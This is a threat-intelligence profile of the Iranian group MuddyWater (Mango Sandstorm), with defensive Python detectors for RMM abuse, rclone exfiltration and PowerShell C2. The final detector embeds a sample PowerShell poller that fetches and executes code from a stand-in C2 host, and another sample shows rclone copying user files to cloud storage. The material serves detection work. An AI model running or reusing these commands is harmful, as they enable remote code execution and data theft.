type: Nation-State
threat_level: Critical
status: Active
origin: Iran — MOIS-linked
mitre: G0069
last_updated: 2026-03-27

Mango Sandstorm / Mercury

also known as: MuddyWater, TA450, Seedworm, Static Kitten, Earth Vetala, TEMP.Zagros, Boggy Serpens. mitre: G0069

Iran's MOIS-subordinate espionage group, active since at least 2017 with one of the broadest geographic footprints among Iranian APTs, covering the Middle East, Asia, Africa, Europe, and North America. Known to most vendors as MuddyWater, the group began abusing legitimate remote monitoring and management (RMM) tools in 2021 and, after October 2023, made them (Atera, SimpleHelp, ScreenConnect, and others) its primary foothold mechanism in place of PowerShell-heavy loaders, blending C2 traffic with normal IT operations and significantly raising detection difficulty. In parallel it has developed a generation of custom C2 frameworks (PhonyC2, MuddyC2Go, DarkBeatC2) and backdoors (BugSleep, MuddyViper, Dindoor), and has handed off access to DEV-1084 for destructive wiper operations. Active intrusions against US critical infrastructure were confirmed through early 2026.

attributed origin: Iran — Ministry of Intelligence and Security (MOIS)
formal attribution: US CYBERCOM + CISA — January 2022
mitre group id: G0069 (MuddyWater)
active since: At least 2017 (likely earlier)
defining shift: 2023: RMM tool abuse replacing PowerShell for initial foothold
sectors: Telecom, Government, Defense, Energy, Oil & Gas
geographic scope: Middle East, Asia, Africa, Europe, North America
key tooling: BugSleep, DarkBeatC2, Atera/RMM, MuddyViper, Dindoor
current status: ACTIVE — US critical infra intrusions confirmed 2026

Overview

Mango Sandstorm — the current Microsoft designation for the group most widely known as MuddyWater — is formally attributed to Iran's Ministry of Intelligence and Security (MOIS) as a subordinate element conducting cyber espionage on MOIS's behalf. US Cyber Command and CISA made the attribution public in January 2022, confirming what researchers had assessed since the group's first appearance in 2017 on the basis of targeting alignment and exposed Iranian IP addresses. The group's primary mission is long-term persistent access for intelligence collection: it does not conduct financially motivated attacks, and its destructive operations are carried out by partner threat actors to whom it hands off access rather than with its own tooling.

The group's defining characteristic through its first several years was an evolving PowerShell-based toolkit — the POWERSTATS backdoor and subsequent custom PowerShell loaders that changed incrementally with each public exposure. This approach, while adaptive, generated a consistent behavioral signature that defenders learned to detect. Beginning in 2021 and accelerating significantly after October 2023, the group shifted its primary initial access strategy toward abusing legitimate remote monitoring and management (RMM) tools. By deploying commercially licensed software like Atera Agent, SimpleHelp, ScreenConnect, RemoteUtilities, and N-able as their foothold mechanism, the group's C2 traffic becomes nearly indistinguishable from legitimate IT management traffic — a significant detection evasion improvement over custom PowerShell loaders.

The October 2023 Hamas attack on Israel and the subsequent Israeli military response triggered a notable escalation in Mango Sandstorm activity. HarfangLab documented a surge in Atera Agent deployment campaigns beginning immediately after October 7, 2023, targeting Israeli organizations across multiple industries. This post-October 2023 wave extended to businesses in India, Algeria, Turkey, Italy, and Egypt — consistent with the group's broad geographic scope while intensifying Israeli targeting.

Simultaneously, the group continued investing in custom C2 framework development. Deep Instinct documented DarkBeatC2 in April 2024 — the latest in a succession of custom frameworks including MuddyC3, PhonyC2, MuddyC2Go, and SimpleHarm. Each framework uses PowerShell for C2 communication over HTTPS with TLS 1.2, polling C2 servers in a loop with configurable sleep intervals. The BugSleep implant, documented in mid-2024, and MuddyViper, documented by ESET between September 2024 and March 2025 against Israeli organizations, extended the group's custom malware family further.

A particularly significant intelligence finding came from Amazon Threat Intelligence in November 2024: Mango Sandstorm operators were documented having accessed compromised servers containing live CCTV feeds prior to attacks in Israel and the Red Sea. This correlation between pre-positioning on surveillance infrastructure and subsequent kinetic military operations — while not establishing a direct causal link — raised documented concerns about MOIS providing tactical intelligence support to Iranian military and proxy operations. In early 2026, FBI and CISA reported Mango Sandstorm-linked activity backdooring US critical infrastructure including a bank, an airport, and a non-profit, using the Dindoor backdoor and DarkBeatC2 implants.

Target Profile

Mango Sandstorm has one of the broadest documented target geographies of any Iranian APT, reflecting MOIS's global intelligence collection mandate across adversaries, partners, and neutral parties alike.

  • Middle East — Government, Telecom, Energy (primary): Gulf Cooperation Council member states are heavily targeted, with documented intrusions across UAE government ministries and telecommunications, Saudi Arabian energy and government agencies, Kuwaiti government networks and banking, Bahraini telecommunications, and Qatari and Omani critical infrastructure. Israel has been an intensive focus since at least 2023, with campaigns targeting government agencies, defense sector, IT companies, airlines, pharma, and manufacturing. Turkey, Jordan, Iraq, and Afghanistan have also appeared repeatedly across multi-year campaign documentation.
  • Asia — India, Pakistan, Azerbaijan: Government entities and critical infrastructure across South Asia and the Caucasus. India has appeared in multiple campaign victim lists including the October 2023–2024 Atera Agent wave. Pakistan has been targeted in coordination with campaigns against neighboring countries with overlapping geopolitical interest for MOIS.
  • Africa: Algeria was identified among targets in the October 2023 Atera wave. Broader African targeting reflects MOIS intelligence requirements across the African Union states where Iranian diplomatic engagement and economic interests have expanded.
  • Europe — NATO States: Belgium, Italy, and other European targets have appeared in documented campaigns. European targeting primarily reflects espionage against NATO-member organizations connected to Middle East policy and sanctions enforcement.
  • North America — US Critical Infrastructure: FBI and CISA confirmed Mango Sandstorm-linked activity backdooring US critical infrastructure in early 2026 — a bank, an airport, and a non-profit — using Dindoor and DarkBeatC2. Earlier US targeting documented by MITRE ATT&CK spans government, defense, and oil and gas organizations.
  • Sector priorities across all geographies: Telecommunications (providing communications intelligence), government (diplomatic and policy intelligence), defense and military, oil and natural gas, and critical infrastructure. The group's consistent sector focus across all geographies reflects stable MOIS collection priorities rather than opportunistic targeting.

Tactics, Techniques & Procedures

Mango Sandstorm has undergone the most significant TTP evolution of any Iranian APT in the 2023–2025 period. The shift from PowerShell backdoors to RMM tool abuse represents a deliberate evasion adaptation rather than a capability gap — the group continues developing custom malware while adding legitimate tool abuse as a first-stage layer.

mitre id | technique | description
T1566.001/002 | Spear-Phishing — RMM Delivery | The primary initial access vector since 2021, now dominant. Spearphishing emails deliver links to file-sharing services (Egnyte, Onehub, Sync, TeraBox) hosting ZIP archives containing RMM installer packages. A notable 2024 innovation: PDF attachments containing malicious embedded links replacing direct email links, documented by Proofpoint in March 2024 against Israeli employees of multinational organizations using salary-related lures. Some messages are sent from compromised .IL (Israeli) business email accounts to maximize credibility. Social engineering themes include flight status tools, regional development programs, cybersecurity webinars, and online courses.
T1219 | Remote Access Tools — RMM Software Abuse | The defining TTP shift of the 2023–2025 period. Rather than deploying custom backdoors as first-stage tools, Mango Sandstorm deploys commercially licensed RMM products (Atera Agent, SimpleHelp, ScreenConnect, RemoteUtilities, Syncro, N-able) as their initial foothold. These tools have legitimate certificates, are recognized by endpoint security products as trusted software, communicate over standard HTTPS, and generate traffic indistinguishable from legitimate IT management activity. The group has tested multiple RMM products and currently favors Atera. When RMM tool detection rates increase following vendor disclosure, the group switches to alternative products or reverts to custom implants.
T1190 | Exploit Public-Facing Application | Vulnerability exploitation complements the spearphishing model. Documented exploitation includes Log4Shell (CVE-2021-44228) in SysAid servers, PaperCut print management (CVE-2023-27350), and internet-facing application vulnerabilities in general. The MERCURY + DEV-1084 destructive campaign documented by Microsoft in April 2023 used Log4j exploitation as a probable entry vector into hybrid Azure/on-premises environments.
T1059.001 | PowerShell — Custom C2 Frameworks | Mango Sandstorm has developed a succession of custom C2 frameworks all using PowerShell as their agent-side execution layer: MuddyC3, PhonyC2 (June 2023), MuddyC2Go (November 2023, server side written in Go), DarkBeatC2 (April 2024). Each framework polls a C2 server via PowerShell HTTPS requests (Invoke-WebRequest with TLS 1.2) in a sleep loop, executes received scriptblock content, and writes results back to the C2. DarkBeatC2 specifically checks response content for the string "SRT_" to determine sleep duration adjustments. This framework succession reflects continuous development investment despite the simultaneous shift to RMM tool abuse.
T1587.001 | BugSleep, MuddyViper, Dindoor — Custom Implants | BugSleep (first documented mid-2024) is a Python-based implant providing system information gathering, persistence, interactive shell, and file upload/download. Phoenix, documented by Group-IB as a lightweight BugSleep variant, added browser credential stealing (Brave, Chrome, Edge, Opera). MuddyViper was documented by ESET in deployments against Israeli organizations between September 2024 and March 2025. Dindoor, a Deno runtime-based backdoor, was used in February 2026 US infrastructure intrusions alongside Fakeset (Python-based, with code-signing certificate lineage to earlier MuddyWater families). Rclone is used for data exfiltration to Wasabi cloud storage, blending with legitimate cloud traffic.
T1003.001 / T1555.003 | Credential Dumping — LSASS and Browser Credentials | Post-initial-access credential collection proceeds via LSASS memory dumping using standard Windows tools and custom Mimikatz variants. Browser credential harvesting (Chrome, Firefox, Edge, Brave, Opera) is documented in recent BugSleep/Phoenix variants, reflecting expansion beyond Windows credential stores into the browser credential ecosystem that many organizations do not adequately protect. Harvested credentials support lateral movement and account takeover for subsequent spearphishing from compromised legitimate email accounts.
T1485 | Destructive Collaboration — DEV-1084 / DarkBit | Microsoft's April 2023 report documented MERCURY providing initial access to DEV-1084 (also known as DarkBit), which then executed destructive wiper attacks against hybrid Azure/on-premises environments: deleting Azure resources, distributing ransomware-like disk wipers on-premises, and operating a fake ransomware payment portal with no actual decryption. The hand-off model mirrors Moses Staff's approach: an espionage-focused group achieving access and passing it to a destruction-focused actor. DEV-1084 uses MERCURY-associated infrastructure including IP address 146.70.106[.]89, MULLVAD VPN, and the C2 domain vatacloud[.]com.
RMM as malware — the detection gap

Mango Sandstorm's shift to legitimate RMM tools as first-stage C2 infrastructure exploits a specific gap in most organizations' detection posture: RMM products are trusted by endpoint security, generate no behavioral alerts on execution, communicate over standard HTTPS to vendor cloud infrastructure, and are indistinguishable from legitimate IT administration traffic. An Atera Agent deployed by an attacker looks identical to one deployed by an IT department. Organizations defending against this group must implement RMM software inventory controls, alert on any RMM product installation not authorized through an approved change process, and monitor for RMM agent communications from endpoints where no RMM product was previously installed.
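The authorization-based check described above, as an added example (not code from this profile or from any RMM or EDR vendor): it reviews a software-inventory export against an approved-change list and flags RMM agents that have no change ticket, sit on segments where IT management tooling has no business, or enrolled under an account outside the organization's mail domain. The record layout, hostnames, accounts, ticket IDs and the `example.org` mail domain are all assumptions; adapt the field names to whatever your EDR or CMDB exports.

```python
"""Flag RMM agents that appear outside change management.

Added example for this profile, not code from the page or from any vendor.
It assumes a software-inventory export shaped like the constructed records
below and an approved-change list keyed by (host, product); the field names,
hosts, accounts and ticket IDs are hypothetical.
"""
from dataclasses import dataclass

# RMM products this actor is documented deploying (see the TTP table above).
RMM_PRODUCTS = ("atera", "simplehelp", "screenconnect", "remote utilities",
                "remoteutilities", "n-able", "syncro")

ORG_MAIL_DOMAIN = "example.org"             # assumption: the defender's mail domain
RMM_FORBIDDEN_SEGMENTS = {"server", "ot"}   # no IT-management tooling expected here


@dataclass(frozen=True)
class InstallRecord:
    host: str
    product: str           # display name as reported by the inventory agent
    installer_user: str    # account that ran the installer
    agent_account: str     # e-mail the agent enrolled under ("" if unknown)
    segment: str           # "workstation", "server" or "ot"


# Constructed sample inventory; none of this is real telemetry.
INVENTORY = [
    InstallRecord("WS-0142", "AteraAgent", "CORP\\helpdesk-svc", "rmm@example.org", "workstation"),
    InstallRecord("WS-0207", "AteraAgent", "CORP\\jdoe", "support.desk@mail.example", "workstation"),
    InstallRecord("FS-01", "SimpleHelp Remote Access", "CORP\\jdoe", "", "server"),
    InstallRecord("WS-0311", "Microsoft Teams", "CORP\\asmith", "", "workstation"),
    InstallRecord("PLC-GW-2", "ScreenConnect Client", "CORP\\svc-backup", "", "ot"),
]

# (host, product) pairs IT actually authorized, with the change ticket (hypothetical).
APPROVED_CHANGES = {("WS-0142", "AteraAgent"): "CHG-0042"}


def is_rmm(product: str) -> bool:
    """True if the inventory display name matches a known RMM product."""
    name = product.lower()
    return any(p in name for p in RMM_PRODUCTS)


def review_install(rec: InstallRecord) -> list:
    """Return the reasons this record should alert; an empty list means clean."""
    if not is_rmm(rec.product):
        return []
    reasons = []
    if (rec.host, rec.product) not in APPROVED_CHANGES:
        reasons.append("rmm_without_change_ticket")
    if rec.segment in RMM_FORBIDDEN_SEGMENTS:
        reasons.append(f"rmm_on_{rec.segment}_segment")
    # An agent enrolled under an address outside the org's domain is the
    # operator-controlled-account pattern listed in the IOC section.
    if rec.agent_account and not rec.agent_account.lower().endswith("@" + ORG_MAIL_DOMAIN):
        reasons.append("agent_enrolled_to_foreign_account")
    return reasons


def review_inventory(records) -> dict:
    """Map host -> alert reasons for every RMM install that needs review."""
    findings = {}
    for rec in records:
        reasons = review_install(rec)
        if reasons:
            findings[rec.host] = reasons
    return findings


if __name__ == "__main__":
    for host, reasons in review_inventory(INVENTORY).items():
        print(f"{host}: {', '.join(reasons)}")
```

Run against the constructed inventory, only WS-0142 comes back clean: it has a ticket, sits on a workstation and enrolled under the organization's own domain. The point of keying on the change ticket rather than on the binary is the one the paragraph makes: the same signed Atera installer is benign on one host and an intrusion on the next, so the authorization record, not the file, is what separates them.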

Known Campaigns

Mango Sandstorm's campaign history spans nearly a decade of continuous operation, with the most significant documented activity concentrated from 2022 to early 2026.

Initial Middle East Campaigns — POWERSTATS Era 2017–2021

MuddyWater first appeared in 2017 targeting government and private organizations in Saudi Arabia, Iraq, Israel, UAE, Georgia, India, Pakistan, Turkey, and the United States. The defining tool was POWERSTATS — a PowerShell-based first-stage backdoor that evolved incrementally across multiple campaigns. Despite public exposure, the group continued operating with only minor changes, demonstrating the characteristic resilience of MOIS-linked operations. US Cyber Command officially attributed the group to MOIS in January 2022, publishing a suite of malware samples used by Iranian government-sponsored actors.

MERCURY + DEV-1084 — Hybrid Cloud Destructive Attack 2022–2023 (disclosed April 2023)

Microsoft documented a coordinated destructive operation in which MERCURY (Mango Sandstorm) achieved initial access via Log4j exploitation and passed that access to DEV-1084, which then executed a multi-phase destructive campaign: on-premises disk encryption and deletion, destruction of Azure cloud resources including virtual machines, storage accounts, and virtual networks, and operation of a fake DarkBit ransomware payment portal with no actual decryption capability. The hand-off between the espionage-focused MERCURY and the destructive DEV-1084 mirrors the Moses Staff model and reflects a MOIS organizational approach in which different capabilities are maintained in coordinated but distinct operational cells.

Rashim Software Supply Chain — Israeli Academic Sector 2023–2024

Deep Instinct and OP Innovate documented a supply chain attack in which the group (using the "Lord Nemesis" faketivist persona) compromised Rashim Software — an Israeli IT provider — and used privileged credentials to access Rashim's clients in the Israeli academic sector. Rashim notified over 200 customers of the breach in March 2024, four months after the initial compromise. This supply chain approach — compromising a single IT vendor to access its entire client base — reflects growing operational sophistication and a shift toward indirect access paths that are harder to detect until significant secondary compromise has occurred.

Post-October 2023 Atera Wave — Israel and Regional Targets October 2023 – April 2024

Beginning immediately after the October 7, 2023 Hamas attack, Mango Sandstorm significantly intensified its targeting of Israeli organizations using Atera Agent as the primary foothold mechanism. HarfangLab documented the escalation and its continuation through April 2024, covering businesses in Israel, India, Algeria, Turkey, Italy, and Egypt across sectors including airlines, IT companies, telecom, pharma, automotive manufacturing, logistics, travel, and tourism. Spearphishing lures referenced the Golan Regional Council development program, flight status utilities, and other geopolitically relevant themes. In March 2024, Proofpoint documented a shift to PDF attachments with embedded links — a new delivery refinement to avoid plain-text email link detection.

BugSleep and MuddyViper — Custom Implant Evolution 2024

Check Point Research and Group-IB documented BugSleep in mid-2024 — a Python-based implant targeting Turkey, Azerbaijan, Jordan, Saudi Arabia, Israel, and Portugal. The lightweight Phoenix variant of BugSleep added browser credential stealing (Chrome, Firefox, Edge, Brave, Opera) and was found on attacker C2 infrastructure alongside RMM utilities. ESET separately documented MuddyViper deployment against Israeli organizations between September 2024 and March 2025. The simultaneous development of RMM-based access and custom implants reflects a layered strategy: RMM tools for initial persistent access, custom implants for specialized collection objectives that RMM software cannot fulfill.

CCTV Pre-Positioning — Kinetic Operation Support November 2024 (Amazon disclosure)

Amazon Threat Intelligence disclosed in November 2024 that Mango Sandstorm operators had accessed compromised servers containing live CCTV camera feeds at locations in Israel and the Red Sea prior to attacks in those areas. The correlation between MOIS access to physical surveillance infrastructure and subsequent kinetic military or proxy operations — while not establishing a direct causal chain — was assessed as significant intelligence support activity, potentially providing MOIS with situational awareness of locations prior to Iranian proxy actions. This represents a documented extension of cyber intrusion capability into tactical intelligence support for kinetic operations.

Dindoor/Fakeset — US Critical Infrastructure Backdooring February 2026 (confirmed March 2026)

A February 2026 coordinated intrusion campaign targeting US, Israeli, and Canadian organizations — confirmed by FBI and CISA — used the Dindoor backdoor (Deno runtime-based) and Fakeset (Python-based, with code-signing certificate lineage to prior MuddyWater families including Stagecomp and Darkcomp). Confirmed victims included a US bank, a US airport, a non-profit, and an Israeli software company. Data was exfiltrated via Rclone to Wasabi cloud storage. The campaign was assessed as strategic pre-positioning and intelligence collection during a period of geopolitical escalation following US government actions related to Iran.

Tools & Malware

Mango Sandstorm operates the most diverse and continuously evolving toolchain of any Iranian APT — combining a custom C2 framework succession with legitimate RMM tool abuse and a growing portfolio of custom implants.

  • Legitimate RMM Tools (Atera, SimpleHelp, ScreenConnect, RemoteUtilities, N-able, Syncro): The primary first-stage mechanism since 2021. Atera Agent is the current preferred tool following a period of SimpleHelp use in 2023. Installer packages are distributed through phishing delivery chains and, once installed, provide the operators with full remote management capability indistinguishable from legitimate IT administration traffic. The group configures the RMM agents with operator-controlled email addresses or accounts before distributing installer packages.
  • DarkBeatC2: The most recent custom C2 framework (documented April 2024), using PowerShell for C2 communication over HTTPS/TLS 1.2 via Invoke-WebRequest. Polls C2 in a loop with 20-second sleep intervals, checks response content for "SRT_" sleep-adjustment strings, converts non-null responses into scriptblock and executes them. Hosted on infrastructure in subnets previously associated with PhonyC2 and MuddyC2Go campaigns.
  • PhonyC2 and MuddyC2Go: Prior-generation custom C2 frameworks. PhonyC2 (June 2023) uses a similar PowerShell polling model; MuddyC2Go (November 2023) has a server side written in Go rather than Python, while its agent side still relies on PowerShell, so the language shift changes the operator tooling more than what runs on victim endpoints. Both succeeded SimpleHarm and MuddyC3.
  • BugSleep and Phoenix: Python-based implants documented in mid-2024. BugSleep provides system information gathering, persistence, interactive shell, and file upload/download. Phoenix is a lighter-weight variant adding browser credential stealing from Brave, Chrome, Edge, and Opera. Infrastructure hosting Phoenix also serves RMM utilities, indicating a role as a combined credential theft and access maintenance tool.
  • MuddyViper: A backdoor deployed against Israeli organizations between September 2024 and March 2025 per ESET research. Details are limited in public reporting but represent a distinct implant family from BugSleep.
  • Dindoor (Deno-based) and Fakeset (Python): The most recently documented implant generation (February 2026 US infrastructure campaign). Dindoor is notable for using the Deno runtime — a less common execution environment that reduces detection by tools trained primarily on Python and PowerShell. Fakeset's code-signing certificate lineage directly links it to earlier MuddyWater families (Stagecomp, Darkcomp), providing a strong attribution anchor despite the new malware family designation.
  • POWERSTATS and Historical PowerShell Loaders: The foundational tool across 2017–2021 campaigns. A PowerShell-based backdoor providing basic C2 functionality through iterative script updates. Still referenced in attack analysis as the original MuddyWater signature capability, though now superseded by the RMM and custom framework approach.
  • Rclone: An open-source cloud sync tool used for data exfiltration, directing collected material to Wasabi cloud storage buckets. By using a legitimate cloud service with a known commercial utility, exfiltration traffic is nearly indistinguishable from authorized cloud backup or sync operations.

Indicators of Compromise

Mango Sandstorm's most current threat indicators reflect the RMM tool abuse model and custom C2 frameworks. Static infrastructure IOCs rotate frequently; behavioral indicators are more durable.

RMM abuse behavioral indicators
behavior: Atera Agent / SimpleHelp / ScreenConnect installed without IT change management authorization
behavior: RMM installer package downloaded via email link to Egnyte, Onehub, Sync, or TeraBox
behavior: PDF attachment with embedded file-sharing link as phishing delivery vector
behavior: Atera Agent configured to operator-controlled email address (not matching organization's IT domain)
indicator: Phishing email received from compromised .IL (Israeli) business email account
DarkBeatC2 / custom framework indicators
behavior: PowerShell Invoke-WebRequest polling external HTTPS URL in 20-second loop — DarkBeatC2 pattern
behavior: PowerShell scriptblock creation and execution from HTTP response content
behavior: C2 response checked for "SRT_" string prefix — DarkBeatC2 sleep adjustment mechanism
domain: googlevalues[.]com — DarkBeatC2 associated domain (historical, February 2024)
domain: vatacloud[.]com — DEV-1084/MERCURY collaboration C2 domain
ip: 146.70.106[.]89 — MERCURY/DEV-1084 collaboration IP (historical)
BugSleep / Phoenix indicators
c2 server: 159.198.36[.]115 — Phoenix/BugSleep C2 also hosting RMM utilities (2025)
Dindoor/Fakeset — February 2026 campaign
exfil: Rclone configured to Wasabi cloud storage buckets — exfiltration blends with cloud sync traffic
exfil: Backblaze B2 storage services — staging infrastructure used in Dindoor campaigns
cert lineage: Fakeset code-signing certificates previously associated with Stagecomp and Darkcomp MuddyWater families
runtime: Deno runtime execution — unusual execution environment, monitor for deno.exe in unexpected contexts
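The Rclone and Deno indicators above turned into process-creation triage, as an added example (not code from this profile or from any vendor): it tags rclone launched by anything other than an allowlisted backup scheduler, rclone command lines that point at Wasabi or Backblaze B2 endpoints, and deno.exe running outside a developer path or spawned by a script host. The Sysmon-style field names, the `BackupSuite\scheduler.exe` allowlist entry, the per-user `\dev\` convention and the hostnames are assumptions, and every event below is constructed.

```python
"""Triage process-creation events for the Rclone and Deno indicators above.

Added example for this profile, not code from the page or from any vendor.
It assumes Sysmon-style process-creation records with Image, CommandLine,
ParentImage and Computer fields (the constructed events below); the
allowlisted backup parent, the developer path convention and the hostnames
are assumptions.
"""
import re
from pathlib import PureWindowsPath

# Object-storage endpoints named in the IOC section, plus rclone's s3/b2 backends.
OBJECT_STORAGE = re.compile(r"wasabisys\.com|backblazeb2\.com|\bb2:|\bs3:", re.I)
# Assumption: the only parent allowed to launch rclone on this estate.
AUTHORIZED_RCLONE_PARENTS = {r"c:\program files\backupsuite\scheduler.exe"}
# Assumption: developers keep toolchains under a per-user \dev\ tree.
DEV_PATH = re.compile(r"\\dev\\", re.I)
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Constructed sample events; none of this is real telemetry.
SAMPLE_PROCESS_EVENTS = [
    {"Computer": "FS-01",
     "Image": r"C:\Program Files\BackupSuite\rclone.exe",
     "ParentImage": r"C:\Program Files\BackupSuite\scheduler.exe",
     "CommandLine": r"rclone.exe sync D:\Backups backup-remote:nightly"},
    {"Computer": "WS-0207",
     "Image": r"C:\Users\Public\rc\rclone.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"rclone.exe copy C:\Users\jdoe\Documents :s3:drop-7731 --s3-endpoint s3.wasabisys.com -q"},
    {"Computer": "WS-0311",
     "Image": r"C:\Users\asmith\dev\deno\deno.exe",
     "ParentImage": r"C:\Users\asmith\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "CommandLine": "deno run --allow-net server.ts"},
    {"Computer": "WS-0099",
     "Image": r"C:\ProgramData\upd\deno.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"deno.exe run -A C:\ProgramData\upd\main.ts"},
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return PureWindowsPath(path).name.lower()


def triage_process(ev: dict) -> list:
    """Return alert tags for one process-creation event; empty list means no alert."""
    image, parent = basename(ev["Image"]), basename(ev["ParentImage"])
    cmd = ev.get("CommandLine", "")
    tags = []
    if image in ("rclone.exe", "rclone"):
        if ev["ParentImage"].lower() not in AUTHORIZED_RCLONE_PARENTS:
            tags.append("rclone_unauthorized_parent")
        if OBJECT_STORAGE.search(cmd):
            tags.append("rclone_to_object_storage")
    if image == "deno.exe":
        if not DEV_PATH.search(ev["Image"]):
            tags.append("deno_outside_dev_path")
        if parent in SCRIPT_HOSTS:
            tags.append("deno_spawned_by_script_host")
    return tags


def triage_process_events(events) -> list:
    """Return (Computer, tags) for every event that produced at least one tag."""
    return [(ev["Computer"], tags) for ev in events if (tags := triage_process(ev))]


if __name__ == "__main__":
    for computer, tags in triage_process_events(SAMPLE_PROCESS_EVENTS):
        print(f"{computer}: {', '.join(tags)}")
```

The authorized backup job on FS-01 and the developer's Deno on WS-0311 produce no tags; the PowerShell-spawned rclone pushing a user's Documents folder to a Wasabi S3 endpoint, and the Deno binary dropped under ProgramData and launched from PowerShell, each produce two. The parent-process and path checks are what keep the rules useful after the endpoint names rotate, which the IOC section notes they do.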

Mitigation & Defense

The RMM tool abuse model fundamentally changes the defensive challenge: standard malware detection is ineffective against signed, commercial software. Defense must shift to authorization-based controls.

  • Implement RMM software inventory and unauthorized installation alerting: Maintain an approved list of RMM products authorized for use in your environment. EDR and endpoint management policies should alert — or block — any RMM product installation that was not initiated through an approved change management process. Atera Agent, SimpleHelp, ScreenConnect, and RemoteUtilities appearing on endpoints where they were not previously present should generate immediate security alerts regardless of the legitimacy of the software itself.
  • Monitor for RMM network traffic from unexpected endpoints: RMM products generate characteristic outbound traffic to vendor cloud infrastructure. Network monitoring should alert on RMM protocol traffic originating from servers, industrial systems, or other endpoints where IT management tools have no legitimate role. Network segmentation that blocks RMM vendor cloud endpoint connectivity from these segments eliminates this attack vector for those environments.
  • Block PDF attachment links at email gateway and train users on the vector: Mango Sandstorm's 2024 shift to PDF attachments with embedded file-sharing links targets users who have been trained not to click links in email bodies but may not apply the same scrutiny to links within PDF attachments. Email security should extract and scan links from PDF attachments with the same rigor as email body links. User awareness training should explicitly address this variant.
  • Enable PowerShell Script Block Logging (Event ID 4104): DarkBeatC2 and prior custom C2 frameworks all execute via PowerShell scriptblocks. Script Block Logging captures the actual content of executed PowerShell scripts — including dynamically constructed scriptblocks assembled from C2 responses — and feeds it to SIEM detection rules. This is the single highest-value control for detecting Mango Sandstorm's custom C2 framework generation. Combining with AMSI integration enables real-time detection of malicious scriptblock content before execution completes.
  • Monitor Rclone and cloud sync tool execution for exfiltration: Rclone is the documented data exfiltration tool for the Dindoor/Fakeset campaign wave. DLP and endpoint controls should alert on Rclone execution — particularly when launched by processes not associated with authorized backup or sync workflows — and monitor outbound data volumes to Wasabi, Backblaze B2, and other object storage services from endpoints that have no legitimate business use of those services.
  • Patch Log4j, PaperCut, and internet-facing application vulnerabilities on an emergency basis: Log4Shell and PaperCut CVE-2023-27350 were both exploited by Mango Sandstorm well after patch availability. Any organization running unpatched versions of applications on CISA's Known Exploited Vulnerabilities catalog — particularly internet-facing — should treat them as active intrusion vectors. Vulnerability management programs that treat exploitation-confirmed CVEs as critical-priority patches within days of disclosure are the appropriate response posture for an organization in this threat group's targeting scope.
  • Alert on Deno runtime execution in enterprise environments: Dindoor uses the Deno runtime — a legitimate JavaScript/TypeScript execution environment with no common enterprise application use case. Any Deno runtime execution on enterprise endpoints (deno.exe) not associated with developer tooling should generate an immediate alert, as legitimate enterprise workloads have almost no reason to use Deno outside of development environments.
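The Script Block Logging control above is only as good as what you run over the captured Event ID 4104 content, so here is the scoring logic for the custom-framework pattern this profile describes (the DarkBeatC2 row of the TTP table and the DarkBeatC2 IOC lines), as an added example that is not code from this profile or from any vendor. It weights an HTTPS fetch inside a sleep loop, TLS 1.2 forced on the connection, response content turned into a scriptblock and executed, and the "SRT_" prefix. The event records are constructed, and the C2-style script text is a stylized stand-in for the pattern pointed at an `example.invalid` host, not a real sample; the rule weights and threshold are assumptions to tune.

```python
"""Score PowerShell script blocks (Event ID 4104) for the C2 polling pattern.

Added example for this profile, not code from the page or from any vendor.
Weights the behaviours the page attributes to DarkBeatC2 and its predecessors.
The event records are constructed and the C2-style text is a stylized
stand-in for the pattern, not a real sample; weights and threshold are
assumptions.
"""
import re

# rule name -> (pattern over ScriptBlockText, weight)
RULES = {
    "web_fetch":    (re.compile(r"\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm|DownloadString)\b", re.I), 1),
    "loop":         (re.compile(r"\b(while|for)\s*\(", re.I), 1),
    "sleep":        (re.compile(r"\bStart-Sleep\b", re.I), 1),
    "force_tls12":  (re.compile(r"SecurityProtocol\s*=.*Tls12", re.I), 1),
    "dynamic_exec": (re.compile(r"\[scriptblock\]::Create|Invoke-Expression|\biex\b", re.I), 2),
    "srt_marker":   (re.compile(r"SRT_"), 3),   # DarkBeatC2 sleep-adjust prefix
}
ALERT_THRESHOLD = 5   # fetch + loop + sleep + dynamic execution, even without an SRT_ hit

# Constructed script-block contents (ScriptBlockText field of 4104 events).
BENIGN_DOWNLOAD = (
    "Invoke-WebRequest -Uri https://updates.example.org/agent.msi "
    "-OutFile C:\\Temp\\agent.msi"
)
BENIGN_ADMIN_LOOP = (
    "foreach ($s in $servers) { Restart-Service -Name Spooler -ComputerName $s }"
)
C2_STYLE_POLLER = """
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$sleep = 20
while ($true) {
  $r = (Invoke-WebRequest -Uri "https://c2.example.invalid/poll" -UseBasicParsing).Content
  if ($r.StartsWith("SRT_")) { $sleep = [int]$r.Substring(4) }
  elseif ($r) { & ([scriptblock]::Create($r)) }
  Start-Sleep -Seconds $sleep
}
"""

SAMPLE_EVENTS = [
    {"EventID": 4104, "Computer": "WS-0142", "ScriptBlockText": BENIGN_DOWNLOAD},
    {"EventID": 4104, "Computer": "WS-0311", "ScriptBlockText": BENIGN_ADMIN_LOOP},
    {"EventID": 4103, "Computer": "WS-0207", "ScriptBlockText": C2_STYLE_POLLER},  # not a script-block event
    {"EventID": 4104, "Computer": "WS-0207", "ScriptBlockText": C2_STYLE_POLLER},
]


def score_script_block(text: str) -> dict:
    """Return {"score": int, "hits": [rule names]} for one ScriptBlockText."""
    hits = [name for name, (rx, _) in RULES.items() if rx.search(text)]
    score = sum(RULES[name][1] for name in hits)
    return {"score": score, "hits": hits}


def triage_events(events) -> list:
    """Return (Computer, score, hits) for every 4104 event at or over the threshold."""
    out = []
    for ev in events:
        if ev.get("EventID") != 4104:
            continue
        result = score_script_block(ev.get("ScriptBlockText", ""))
        if result["score"] >= ALERT_THRESHOLD:
            out.append((ev["Computer"], result["score"], result["hits"]))
    return out


if __name__ == "__main__":
    for computer, score, hits in triage_events(SAMPLE_EVENTS):
        print(f"{computer}: score={score} hits={hits}")
```

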